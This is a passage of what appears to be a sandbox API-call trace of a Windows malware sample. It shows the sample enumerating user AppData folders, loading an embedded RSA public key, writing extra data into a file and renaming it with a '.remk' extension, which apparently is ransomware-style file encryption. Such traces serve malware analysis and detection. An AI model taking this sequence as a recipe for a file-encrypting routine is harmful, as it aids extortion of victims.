HALPmcxz\\AppData\\") returned="AppData\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf6d8 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0238.031] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.031] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.031] PathFindFileNameW (pszPath="") returned="" [0238.031] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x3189278 [0238.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.034] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.034] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="all", cAlternateFileName="")) returned 1 [0238.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0238.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x3192918 [0238.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed738 [0238.034] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x37ba420 [0238.034] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt", cAlternateFileName="")) returned 1 [0238.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x37ba508 [0238.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x37ba5f0 [0238.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x31de170 [0238.035] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x37ba6d8 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nrw", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="prt", cAlternateFileName="")) returned 1 [0238.035] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spn", cAlternateFileName="")) returned 1 [0238.036] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 1 [0238.036] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeaffa190, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeaffa190, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeaffa190, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swd", cAlternateFileName="")) returned 0 [0238.036] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.037] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.037] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0238.037] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0238.038] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0238.038] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0238.038] PathFindFileNameW (pszPath="") returned="" [0238.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0238.039] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0238.039] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 1 [0238.039] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0238.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0238.040] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=13) returned 1 [0238.040] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0238.043] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.043] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xd, lpOverlapped=0x0) returned 1 [0238.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.044] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0238.044] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0238.046] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0238.046] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0238.046] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0238.046] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0238.046] GetLastError () returned 0x0 [0238.046] CryptDestroyHash (hHash=0x31de170) returned 1 [0238.046] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0238.046] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0238.046] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0238.046] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0238.046] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0238.047] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.047] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0238.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0238.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0238.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0238.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0238.047] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0238.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0238.047] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0238.047] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0238.048] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0238.048] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.048] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0238.048] CloseHandle (hObject=0x640) returned 1 [0238.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf0) returned 0x65dd10 [0238.049] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x900) returned 0x37bd408 [0238.049] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0238.049] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.remk")) returned 1 [0238.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0238.050] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0238.051] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.052] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0238.052] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0238.052] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0238.053] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0238.053] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.053] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0238.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0238.054] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0238.054] 